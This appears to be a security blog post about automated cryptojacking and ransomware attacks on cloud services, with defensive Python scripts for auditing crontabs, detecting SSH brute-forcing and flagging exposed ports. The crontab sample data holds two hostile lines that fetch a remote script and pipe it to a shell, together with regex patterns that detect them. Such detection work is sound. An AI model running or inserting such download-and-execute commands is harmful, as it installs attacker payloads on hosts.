Sadly, we have bad news for today! Hackers are increasingly targeting vulnerable cloud infrastructure to exploit it for covert cryptojacking or to deliver ransomware.
Among this huge number of cyber attacks, some are trivial and almost harmless, but others use multi-vector or multi-platform threats with multiple functionalities, from crypto mining to ransomware, botnet, or worm activity.
Cybersecurity researchers have found that most of these attacks are fully automated. First, the attack probes the infrastructure and cloud services for vulnerabilities and for weak or default login credentials.
The investigation found that the most common ways in are:
• An unauthenticated command execution vulnerability in Apache Hadoop, through the ResourceManager REST API
• A Redis remote command execution bug
• CVE-2016-3088, an ActiveMQ arbitrary file execution flaw.
Remember, everything can be hacked. To stay away from any threats related to the cyber world, we recommend installing an antivirus for Windows or an antivirus for Mac on every device that you own, depending on which OS it runs. If you are a company, we also recommend hiring a specialized cybersecurity company every year to run annual tests on your company’s network. These tests include penetration testing and ethical hacking tests.
The main focus of these cyber attacks is to install a second-stage malware, which is either a crypto miner or a remote access tool.
In some cases, the same malware will move laterally through the infected network to expose services, remove data, or install ransomware.
Persistence is obtained using cron job entries on Linux and malicious startup items on Windows systems. If all goes well for the attackers, their C&C servers will then deliver additional malware, username/password lists, and so on.
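The cron job persistence mentioned above is something a Linux administrator can check for directly. The following is an added example written for this post (not code from the original article or from any of the malware families it names): it parses crontab text and flags the entry shapes that most often belong to cryptojacking droppers, namely commands that download remote content and pipe it straight into a shell, binaries run out of world-writable directories, and every-minute schedules. The crontab lines, the URLs and the IP addresses in it are constructed sample data, not indicators from any real incident.

```python
import re

# Constructed sample crontab (not taken from a real host or incident).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/10 * * * * curl -fsSL http://198.51.100.23/x.sh | sh
@reboot wget -q -O- http://203.0.113.7/i | bash
30 2 * * 1 /usr/local/bin/backup.sh --full
* * * * * /tmp/.x/kworker >/dev/null 2>&1
"""

# Entry shapes a defender would treat as suspicious in a crontab.
DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
WORLD_WRITABLE_DIR = re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/")
HIGH_FREQUENCY = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")


def parse_crontab(text):
    """Yield (schedule, command) for every non-comment, non-empty crontab line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            # @reboot / @daily style entries: one schedule token, then the command.
            schedule, _, command = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed line: fewer than five schedule fields plus a command
            schedule, command = " ".join(parts[:5]), parts[5]
        yield schedule, command


def classify_entry(schedule, command):
    """Return the list of reasons an entry looks like malicious persistence (empty if none)."""
    reasons = []
    if DOWNLOAD_TO_SHELL.search(command):
        reasons.append("downloads remote content and pipes it to a shell")
    if WORLD_WRITABLE_DIR.search(command):
        reasons.append("runs a binary from a world-writable directory")
    if HIGH_FREQUENCY.match(schedule + " "):
        reasons.append("runs every minute")
    return reasons


def find_suspicious_entries(text):
    """Scan crontab text and return the entries that trigger at least one rule."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = classify_entry(schedule, command)
        if reasons:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_entries(SAMPLE_CRONTAB):
        print(f"{finding['schedule']:<14} {finding['command']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

On a real host you would feed it the output of `crontab -l` for each user plus the contents of `/etc/crontab` and `/etc/cron.d/`; the rules are deliberately simple and will flag some legitimate jobs, so treat hits as items to review rather than as verdicts.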
One of the most prolific malware families in use is XBash, an advanced malware that combines many threat behaviors.
Be aware! This threat infects both Linux and Windows systems! It installs cryptojacking scripts and also spreads through the network by brute-forcing weak passwords configured on various services.
If a database service is breached, it deletes the existing databases and creates a new one with a ransom note specifying the amount and the bitcoin wallet.
Cybersecurity experts are advising both companies and individuals to continuously review their cloud infrastructure services that are connected to the internet and to restrict access as much as possible.
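The password brute-forcing described above leaves a loud trail in authentication logs, and catching it early is the cheapest way to stop the worm-like spread. The following is an added example (not code from the post or from any vendor) that reads sshd lines in syslog format, counts failed logins per source address in a sliding one-minute window, and raises an alert once a source exceeds a threshold. The log lines are constructed sample data; the `year` parameter is an assumption made here because syslog timestamps carry no year.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample sshd log lines in syslog format (not from a real host).
SAMPLE_AUTH_LOG = """\
Mar 14 02:10:01 db01 sshd[4120]: Failed password for root from 198.51.100.23 port 51022 ssh2
Mar 14 02:10:02 db01 sshd[4122]: Failed password for root from 198.51.100.23 port 51023 ssh2
Mar 14 02:10:02 db01 sshd[4124]: Failed password for invalid user admin from 198.51.100.23 port 51024 ssh2
Mar 14 02:10:03 db01 sshd[4126]: Failed password for root from 198.51.100.23 port 51025 ssh2
Mar 14 02:10:04 db01 sshd[4128]: Failed password for root from 198.51.100.23 port 51026 ssh2
Mar 14 02:10:05 db01 sshd[4130]: Failed password for invalid user test from 198.51.100.23 port 51027 ssh2
Mar 14 02:15:40 db01 sshd[4201]: Failed password for alice from 203.0.113.7 port 40211 ssh2
Mar 14 02:16:02 db01 sshd[4203]: Accepted password for alice from 203.0.113.7 port 40212 ssh2
Mar 14 03:30:12 db01 sshd[4590]: Failed password for root from 198.51.100.23 port 51900 ssh2
"""

# Captures: syslog timestamp, attempted user name, source address.
FAILED_RE = re.compile(
    r"^(\w{3}\s+\d+\s[\d:]+)\s\S+\ssshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(\S+) from (\S+) port"
)


def parse_failures(text, year=2024):
    """Yield (timestamp, user, source_ip) for each failed-login line.

    Syslog lines carry no year, so one is supplied by the caller (assumption).
    """
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        yield ts, m.group(2), m.group(3)


def detect_bruteforce(text, threshold=5, window=timedelta(minutes=1), year=2024):
    """Return {source_ip: alert} for sources with >= threshold failures inside the window.

    A per-source deque holds the timestamps of recent failures; entries older than
    the window are dropped as each new line arrives, so memory stays bounded.
    """
    recent = defaultdict(deque)
    users = defaultdict(set)
    alerts = {}
    for ts, user, ip in parse_failures(text, year=year):
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = {
                "first_seen": q[0],
                "failures": len(q),
                "users": sorted(users[ip]),
            }
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {alert['failures']} failures since {alert['first_seen']} "
              f"against users {', '.join(alert['users'])}")
```

The same sliding-window logic applies to any service that logs failed authentication (Redis `AUTH` failures, database login errors); only the regular expression changes. A single slow trickle of failures across hours, like the 03:30 line in the sample, deliberately stays below the threshold, so pair this with a longer-window count if low-and-slow guessing is a concern.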
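Reviewing which services are reachable from outside, as the experts advise above, can be scripted. The following is an added example written for this post (not code from the original article): it parses listening sockets in the shape printed by `ss -tln`, skips loopback binds, and rates everything else, with the services the post names as entry points (Redis, the Hadoop ResourceManager, the ActiveMQ web console) rated highest when they listen on all interfaces. The socket table is constructed sample data; the port-to-service mapping uses the products' default ports, and the MongoDB entry is an addition made here as a typical wiped-and-ransomed database, not something the post mentions.

```python
import ipaddress

# Constructed sample in the shape of `ss -tln` output (not from a real host).
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
LISTEN  0       511     0.0.0.0:6379        0.0.0.0:*
LISTEN  0       50      0.0.0.0:8088        0.0.0.0:*
LISTEN  0       128     127.0.0.1:5432      0.0.0.0:*
LISTEN  0       128     [::]:8161           [::]:*
LISTEN  0       50      10.0.4.12:27017     0.0.0.0:*
"""

# Default ports of the services the post names as entry points, plus MongoDB
# (added here as an assumption; the post speaks only of "database services").
RISKY_PORTS = {
    6379: "Redis",
    8088: "Hadoop ResourceManager web UI / REST API",
    8161: "ActiveMQ web console",
    27017: "MongoDB",
}
ALL_INTERFACES = {"0.0.0.0", "::", "*"}


def split_addr_port(field):
    """Split an ss 'addr:port' field, handling bracketed IPv6 and the '*' wildcard."""
    addr, _, port = field.rpartition(":")
    if addr.startswith("[") and addr.endswith("]"):
        addr = addr[1:-1]
    return addr, int(port)


def parse_listeners(text):
    """Return [(local_addr, port)] for each LISTEN row, skipping the header."""
    listeners = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 5 or parts[0] != "LISTEN":
            continue
        listeners.append(split_addr_port(parts[3]))
    return listeners


def is_loopback(addr):
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:  # '*' and other non-literal addresses
        return False


def audit_listeners(text):
    """Rate each non-loopback listener: HIGH, MEDIUM or REVIEW with a short reason."""
    findings = []
    for addr, port in parse_listeners(text):
        if is_loopback(addr):
            continue
        service = RISKY_PORTS.get(port)
        exposed = addr in ALL_INTERFACES
        if service and exposed:
            findings.append((addr, port, "HIGH",
                             f"{service} listening on all interfaces; bind it to localhost or firewall it"))
        elif service:
            findings.append((addr, port, "MEDIUM",
                             f"{service} bound to {addr}; confirm it is not reachable from the internet"))
        elif exposed:
            findings.append((addr, port, "REVIEW",
                             "listening on all interfaces; confirm it needs to be network-facing"))
    return findings


if __name__ == "__main__":
    for addr, port, severity, reason in audit_listeners(SAMPLE_SS_OUTPUT):
        print(f"[{severity:<6}] {addr}:{port} - {reason}")
```

Run it against `ss -tln` on each cloud host and against the equivalent output for Windows, and then compare the HIGH and MEDIUM rows with the security-group or firewall rules: a service bound to all interfaces is only safe if something upstream restricts who can reach it, and the post's point is that for Redis, Hadoop and ActiveMQ that restriction is frequently missing.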
We will continue to monitor this cybersecurity problem. Meanwhile, users should keep a keen eye out for any cyber attacks. Remember to use an antivirus for Windows or an antivirus for Mac on every device that you own, depending on which OS your machine runs. If you are a company, we recommend hiring a specialized cybersecurity company every year to run annual tests on your company’s network; tests like this include penetration testing and ethical hacking.